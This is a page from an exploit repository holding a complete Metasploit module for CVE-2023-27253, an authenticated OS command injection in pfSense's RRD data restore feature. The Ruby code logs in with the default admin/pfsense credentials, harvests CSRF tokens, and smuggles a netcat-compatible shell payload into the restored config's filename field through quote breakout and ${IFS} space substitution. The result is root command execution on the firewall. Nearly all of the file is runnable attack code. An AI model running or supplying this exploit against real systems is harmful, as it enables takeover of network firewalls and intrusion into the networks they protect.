98cdb05106
10 changes to exploits/shellcodes/ghdb Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE. RWS WorldServer 11.7.3 - Session Token Enumeration Aures Booking & POS Terminal - Local Privilege Escalation Boom CMS v8.0.7 - Cross Site Scripting PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities pfSense v2.7.0 - OS Command Injection Webile v1.0.1 - Multiple Cross Site Scripting Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
244 lines
No EOL
8.3 KiB
Ruby
Executable file
244 lines
No EOL
8.3 KiB
Ruby
Executable file
# Exploit Title: pfSense v2.7.0 - OS Command Injection
|
|
#Exploit Author: Emir Polat
|
|
# CVE-ID : CVE-2023-27253
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::CmdStager
|
|
include Msf::Exploit::FileDropper
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'pfSense Restore RRD Data Command Injection',
|
|
'Description' => %q{
|
|
This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of
|
|
pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore"
|
|
privilege to execute arbitrary operating system commands as the "root" user.
|
|
|
|
This module has been tested successfully on version 2.6.0-RELEASE.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'Emir Polat', # vulnerability discovery & metasploit module
|
|
],
|
|
'References' => [
|
|
['CVE', '2023-27253'],
|
|
['URL', 'https://redmine.pfsense.org/issues/13935'],
|
|
['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94']
|
|
],
|
|
'DisclosureDate' => '2023-03-18',
|
|
'Platform' => ['unix'],
|
|
'Arch' => [ ARCH_CMD ],
|
|
'Privileged' => true,
|
|
'Targets' => [
|
|
[ 'Automatic Target', {}]
|
|
],
|
|
'Payload' => {
|
|
'BadChars' => "\x2F\x27",
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd',
|
|
'RequiredCmd' => 'generic netcat'
|
|
}
|
|
},
|
|
'DefaultOptions' => {
|
|
'RPORT' => 443,
|
|
'SSL' => true
|
|
},
|
|
'DefaultTarget' => 0,
|
|
'Notes' => {
|
|
'Stability' => [CRASH_SAFE],
|
|
'Reliability' => [REPEATABLE_SESSION],
|
|
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
|
|
}
|
|
)
|
|
)
|
|
|
|
register_options [
|
|
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
|
|
OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
|
|
]
|
|
end
|
|
|
|
def check
|
|
unless login
|
|
return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!")
|
|
end
|
|
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
|
|
'method' => 'GET',
|
|
'keep_cookies' => true
|
|
)
|
|
|
|
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
|
|
return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
|
|
|
|
unless res&.body&.include?('Diagnostics: ')
|
|
return Exploit::CheckCode::Safe('Vulnerable module not reachable')
|
|
end
|
|
|
|
version = detect_version
|
|
unless version
|
|
return Exploit::CheckCode::Detected('Unable to get the pfSense version')
|
|
end
|
|
|
|
unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE')
|
|
return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected")
|
|
end
|
|
|
|
Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!")
|
|
end
|
|
|
|
def login
|
|
# Skip the login process if we are already logged in.
|
|
return true if @logged_in
|
|
|
|
csrf = get_csrf('index.php', 'GET')
|
|
unless csrf
|
|
print_error('Could not get the expected CSRF token for index.php when attempting login!')
|
|
return false
|
|
end
|
|
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
|
'method' => 'POST',
|
|
'vars_post' => {
|
|
'__csrf_magic' => csrf,
|
|
'usernamefld' => datastore['USERNAME'],
|
|
'passwordfld' => datastore['PASSWORD'],
|
|
'login' => ''
|
|
},
|
|
'keep_cookies' => true
|
|
)
|
|
|
|
if res && res.code == 302
|
|
@logged_in = true
|
|
true
|
|
else
|
|
false
|
|
end
|
|
end
|
|
|
|
def detect_version
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
|
'method' => 'GET',
|
|
'keep_cookies' => true
|
|
)
|
|
|
|
# If the response isn't a 200 ok response or is an empty response, just return nil.
|
|
unless res && res.code == 200 && res.body
|
|
return nil
|
|
end
|
|
|
|
if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil?
|
|
nil
|
|
else
|
|
version
|
|
end
|
|
end
|
|
|
|
def get_csrf(uri, methods)
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, uri),
|
|
'method' => methods,
|
|
'keep_cookies' => true
|
|
)
|
|
|
|
unless res && res.body
|
|
return nil # If no response was returned or an empty response was returned, then return nil.
|
|
end
|
|
|
|
# Try regex match the response body and save the match into a variable named csrf.
|
|
if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil?
|
|
return nil # No match could be found, so the variable csrf won't be defined.
|
|
else
|
|
return csrf
|
|
end
|
|
end
|
|
|
|
def drop_config
|
|
csrf = get_csrf('diag_backup.php', 'GET')
|
|
unless csrf
|
|
fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!')
|
|
end
|
|
|
|
post_data = Rex::MIME::Message.new
|
|
|
|
post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
|
|
post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
|
|
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
|
|
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
|
|
post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')
|
|
post_data.add_part('', nil, nil, 'form-data; name="restorearea"')
|
|
post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
|
|
post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
|
|
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
|
|
'method' => 'POST',
|
|
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
|
'data' => post_data.to_s,
|
|
'keep_cookies' => true
|
|
)
|
|
|
|
if res && res.code == 200 && res.body =~ /<rrddatafile>/
|
|
return res.body
|
|
else
|
|
return nil
|
|
end
|
|
end
|
|
|
|
def exploit
|
|
unless login
|
|
fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
|
|
end
|
|
|
|
csrf = get_csrf('diag_backup.php', 'GET')
|
|
unless csrf
|
|
fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
|
|
end
|
|
|
|
config_data = drop_config
|
|
if config_data.nil?
|
|
fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
|
|
end
|
|
|
|
if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
|
|
fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
|
|
end
|
|
config_data.gsub!(' ', '${IFS}')
|
|
send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")
|
|
|
|
post_data = Rex::MIME::Message.new
|
|
|
|
post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
|
|
post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
|
|
post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
|
|
post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
|
|
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
|
|
post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
|
|
post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
|
|
post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
|
|
post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
|
|
post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')
|
|
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
|
|
'method' => 'POST',
|
|
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
|
'data' => post_data.to_s,
|
|
'keep_cookies' => true
|
|
)
|
|
|
|
if res
|
|
print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
|
|
end
|
|
end
|
|
end |